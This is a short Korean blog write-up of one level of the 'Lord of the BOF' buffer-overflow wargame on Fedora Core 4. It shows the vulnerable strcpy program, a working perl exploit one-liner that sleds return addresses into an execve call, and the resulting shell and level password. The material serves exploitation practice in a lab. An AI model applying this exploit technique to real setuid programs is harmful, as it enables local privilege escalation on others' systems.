int $0x80

dark_stone -> cruel 본문

워게임/Lord Of the BOF

dark_stone -> cruel

cd80 cd80 2013.10.15 14:42

 

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

 

스택에 있는 값을 인자로 사용해 execve함수를 호출했습니다

 

 

[dark_stone@Fedora_2ndFloor ~]$ ./cruel $(perl -e 'print "\xf9\x84\x04\x08"x77, "\xbc\x2a\x83\x00"')
[dark_stone@Fedora_2ndFloor ~]$ /tmp/cruel_pwned -p
cruel_pwned-3.00$ whoami
cruel
cruel_pwned-3.00$ my-pass
euid = 501
come on, come over
cruel_pwned-3.00$  

 

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10
0 Comments
댓글쓰기 폼